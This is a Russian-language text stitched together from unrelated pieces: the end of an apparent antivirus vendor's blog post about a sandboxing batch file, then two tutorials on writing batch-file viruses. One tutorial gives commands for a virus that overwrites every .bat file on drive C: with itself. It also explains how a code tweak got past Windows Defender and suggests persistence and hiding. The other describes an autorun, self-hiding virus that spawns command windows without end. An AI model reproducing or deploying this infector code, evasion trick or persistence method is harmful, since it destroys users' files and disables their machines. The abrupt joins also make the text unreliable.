9. Отрываем cmd.exe под созданным пользователем. Пароль для него можно посмотреть, например, в VBS скрипте рядом с EXE’шником браузера

10. Делаем cd %temp% в новой консольке и пишем «.\____991.exe». Жмём Enter!

11. УРА-УРА!!! Это победа.

12. Кому интересны подробности, то
C:\Users\saferun_user_31714\AppData\Local\Temp>d:\md5.exe ____991.ex
____991.ex : 04DA16B5447D8F2B4BD23AFD469FB153Если бы этот файл запустился, то мы бы увидели веселые картинки и просьбу поработать с платёжным терминалом.
Вместо заключения

Итого наш батник будет очень полезен для защиты от Drive-by атак и эксплойтов при работе с Windows 7 как из-под админа, так и под простым пользователем. Да, у него есть теоретическое ограничение на полезные нагрузки с повышением привилегий, но такое в дикой природе благо редко встречается. Плюсы при работе с батником — его можно очень быстро править и добавлять в него поддержку новых программ, таких как почтовые клиенты, офисные программы и т.д. Настройка, гибкость, клёвость и крутость очень важны, и мы в ЛК это прекрасно понимаем.
Спасибо большое, что дочитали этот поток сознания автора до конца и еще ни разу не нажали на минус. 8) Удачи!
ПС. Данный батник не имеет никакого отношения к SafeBrowser’у, входящему в продукты ЛК.
ППС. Батник создаёт очень удобный Uninstall — на случай если что-то вдруг пошло не так.
ПППС. Как обычно в комментариях тусуется доброжелательный пользователь k1k, который выдаёт себя за автора статьи. Так оно и есть. Спасибо!
Некоторые замечания по БАТ вирусу
Вот в принципе и все. Этого сценария хватает для того, чтобы найти на заражаемом компьютере все файлы нужного типа и выполнить заражение. По сути перезаписать их своим содержимым, без возможности запуска оригинального кода. Но это можно считать хоть и самым примитивным, но все же механизмом заражения.
В данном примере мы не выполняли других функций, кроме как скрытия вывода на экран результатов выполнения директив сценария, изменения текущего каталога на корень диска С:\\, поиска «целей»по маске и перезапись содержимого. Мы могли, например, менять атрибуты заражаемой «цели», чтобы иметь возможность перезаписи файлов с атрибутами «только для чтения». Или мы могли бы запоминать дату и время создания атакуемых файлов и восстанавливать их после заражения, что помогло бы скрываться в системе. Также в наш зловред мог бы прописывать себя в автозагрузку и запускаться при каждом включении компьютера. И так далее, далее, далее. Но цель не в создании «супер» BAT вируса, а только демонстрация основных моментов.
Указанный выше зловред тестировался под ОС Windows 10. В целом, набор команд актуален для всех версий Windows (но это не точно).
При разработки кода возникла интересная ситуация — одна из версий батника была опознана встроенным защитником как вредоносная программа. Все дело в том, что некоторые наборы директив не используются обычными пользователями и характерны для вредоносных программ. Опасный скрипт (по версии встроенного защитника), в конструкции FOR, после слова DO содержал директиву copy (без круглых скобок). Такой сокращенный вариант показался встроенному защитнику опасным. Но после того, как мы несколько изменили код (после слова DO добавили круглые скобки), встроенный защитник перестал ругаться, хоть логика нашего БАТ вируса осталась прежней.
Команды BAT вируса
@echo off
Это наша первая команда, которая будет «возглавлять» наш код. Она означает, что при чтении командным интерпретатором нашего батника не будет выводиться на экран его содержимое. Без этой команды на экране компьютера появлялось бы все, что находится внутри сценария. Даже то, что не должно выводиться.
set filet="*.bat"
Команда set объявляет переменную filet. В этой переменной будет маска для поиска, в нашем случае это файлы с расширением .bat. Можно обойтись и без использовании переменной, но используем эту строчку.
cd C:\\
Команда cd меняет текущий каталог. По умолчанию — текущий каталог тот, в котором находится наш батник. Если мы не используем эту команду, то наш БАТ вирус будет искать «цели» для атаки начиная с текущего каталога. Для того, чтобы охватить весь компьютер, мы указываем нашему сценарию, что нужно начинать с корня диска С:\\.
Находить «цели» мы будем с помощью следующего кода:
FOR /r %%a IN (%filet%) DO ( )
На первый взгляд, это непонятная конструкция, но на самом деле все просто.
Директива FOR указывает нашему сценарию многократное выполнение команд. В нашем случае это поиск всех «целей» в каталоге, после работы с ними переходить к следующему каталогу.
Далее мы вместо терминов «директива» или «команда» относительно FOR будем использовать термин «конструкция», так как будет подразумеваться не только команда FOR, но и ее параметры.
Параметр /r означает, что программа «работает» не только с текущим каталогом, но и со всеми подкаталогами.
%%a
Это переменная нашей конструкции FOR. Вернее, здесь переменная одиночная буква (a). Знак процента (%) указывает, что это не просто буква, а переменная. Двойной знак процента (%%) необходим при работе в конструкции FOR. Также особенность использования переменных в конструкции FOR — использование только одиночных букв.
IN (%filet%)
Здесь мы указываем на параметр конструкции для поиска «целей». Ранее мы объявляли переменную filet, в которой находится значение «.bat». Знак процента (%) с обеих сторон переменной это требования работы с переменными в батниках. Можно было сократить код и обойтись без переменных, но это один из вариантов и в нем есть свои плюсы (отладка, например).
DO ()
Здесь, в круглых скобках, прописывается код, который нужно выполнить.
Изучение FOR
Чтобы лучше понять, что делается в нашей конструкции FOR, немного отойдем от темы. Изучим работу этой команды. Для этого используем еще одну директиву:
echo
FOR /r %%a IN (*.bat) DO ( echo %%a )
Этот скрипт покажет все файлы с расширением .bat в том каталоге, в котором находится наш батник. Заметь — мы не использовали переменной filet. Вместо этого мы напрямую указали ее параметр.
Но после запуска наш скрипт мерцнет черным окошком DOSа и погаснет. Чтобы увидеть результат работы программы, добавим в конце команду:
pause
Эта директива останавливает выполнения сценария и будет ожидать нажатие кнопок на клавиатуре.
Если мы перед нашей конструкцией поставим директиву cd C:\\, например, то наш сценарий начнет искать все с расширением .bat, начиная с корня диска C:\\, то есть по всему ПК.
Ну и еще немного исследования. Вот несколько измененный сценарий:
Заражение батников
В нашем случае используем такой код:
copy %0 %%a > nul
Директива copy проводит копирование. Этой командой наш BAT вирус копирует себя вместо той «цели», что нашел. Причем под тем же именем.
%0
Этот символ (знак процента и ноль, без пробела) означает ссылку на самого себя.
%%a
Узнал? Это наша переменная конструкции FOR, в которой находится на текущий момент путь до заражаемого файла.
> nul
Этот код скрывает результат выполнения команды copy.
Как создать простой. bat вирус?
Создание самых простых вирусов не требует наличия специальных сред для разработки программ. И особых знаний, кстати, тоже. Создать вирусы довольно просто, если использовать для этого командную строку. Для этого нужно немного знать синтаксис командной строки и уметь создавать .bat-файлы.
Что такое .bat-файл и как его создать?
Если очень поверхностно, то это файлы с расширением .bat. Такие файлы несут в себе команды, которые должны быть выполнены командным интерпретатором Windows. Все те команды, которые можно выполнить в окне командной строки, можно вписать в .bat-файл и запустить. Результат будет одинаковым.
Чтобы создать .bat-вирус, нам нужен обычный текстовый редактор. В идеале подойдет для этих целей Блокнот. Создав и открыв новый текстовый документ, Вам нужно вписать туда тот код(команды), которые он должен выполнить. После этого, Вам нужно с помощью меню Сохранить как сохранить этот файл, задав ему какое-либо имя с расширением .bat и указав тип файла Все файлы.
Создаем простейший вирус
В данной статье мы рассмотрим создание вируса, который после своего запуска будет бесконечно открывать окно командной строки. Бесконечно и очень быстро открывающиеся окна командной строки не дадут пользователю спокойно работать. Закрыть их всех не успеет никто и очень скоро они забьют оперативную память компьютера, что в свою очередь сильно затормозит работу компьютера, вплоть до полного зависания. Выглядеть это будет приблизительно так:

Вдобавок, мы закинем наш вирус в автозагрузку, что обеспечит автоматический запуск вируса вместе с операционной системой.
Код создаваемого вируса
Сколько программистов, столько разных решений можно придумать для каждой задачи. Я приведу один из своих методов решения такой задачи.
А теперь разберем сам код. Первая строчка создает папку с именем papka в корне диска C:/. Такой адрес приведен только для примера. Использование же корня папки C:/ не совсем хороший вариант для вируса. Если Вы хотите обеспечить хорошую выживаемость Вашему вирусу, лучше всего спрятать его подальше. Первую команду можно даже пропустить, если Вы закинете сам вирус в уже созданную директорию.
Третья строчка закидывает созданный нами во второй строчке тело вируса в автозагрузку. Для этого используется пользовательская ветка реестра, так как к ней у пользователя всегда есть доступ. А вот использовать автозагрузку компьютера не безопасно, так как пользователь может не иметь административного доступа, что вызовет ненужную ошибку.
Четвертая и пятая строка кода изменяют атрибуты вируса и папки, где хранится вирус. Данными командами, а для этого используется команда attrib, мы добавляем атрибуты Только чтение, Скрытый и Системный и для папки, и для вируса. Использование атрибута r(Только чтение) необязательно. А вот атрибуты Скрытый и Системный хорошо защитят созданный нами вирус. Если не верите, то почитайте статью про вирус, который превращает папки на флешке в ярлыки. Он использует именно эту технологию.
6-ая строчка кода запускает наш вирус. Вы можете пропустить этот пункт, если хотите, чтобы первый запуск вируса произошел только после перезагрузки компьютера.
И, наконец-то, последняя, 7-ая строчка удаляет данный .bat-вирус. Это полезно, так как по этому .bat-файлу можно спокойно выйти на созданный нами вирус и удалить его.
Смысл созданного вируса
Смысл вируса, который уместился в эти 7 строк — создать основной вирус, защитить его и обеспечить его постоянную работу. А так же подмести свои следы. А что делает основной вирус? После запуска основного вируса, он выполняет ту команду, которая вписана в нее. А это команда, в свою очередь, запускает наш вирус, который опять-таки снова запускает самого себя. И так до бесконечности.
Как бороться с такими вирусами?
Во-первых, начало борьбы с данным вирусом начнется после того, как он запуститься. Очень скоро вирус заполнит своими копиями оперативную память и Вы даже мышкой шевельнуть не сможете. Поэтому, такой спектакль нужно пресекать сразу. Для этого прекрасно подойдет кнопка Break на клавиатуре. Жмите ее столько, сколько понадобится, чтобы новые копии перестали создаваться. На клавиатурах без кнопки Break, может помочь сочетание клавиш Ctrl+C.
Как удалить такой вирус?
Вы можете найти и удалить вирус через его запись в автозагрузке(подробнее по ссылке). А так же Вы можете выйти на вирус по команде, которая будет высвечиваться в окне командного интерпретатора. Естественно, если Вы сможете добраться до скрытого и системного файла. Вот таким образом происходит создание простого вируса.



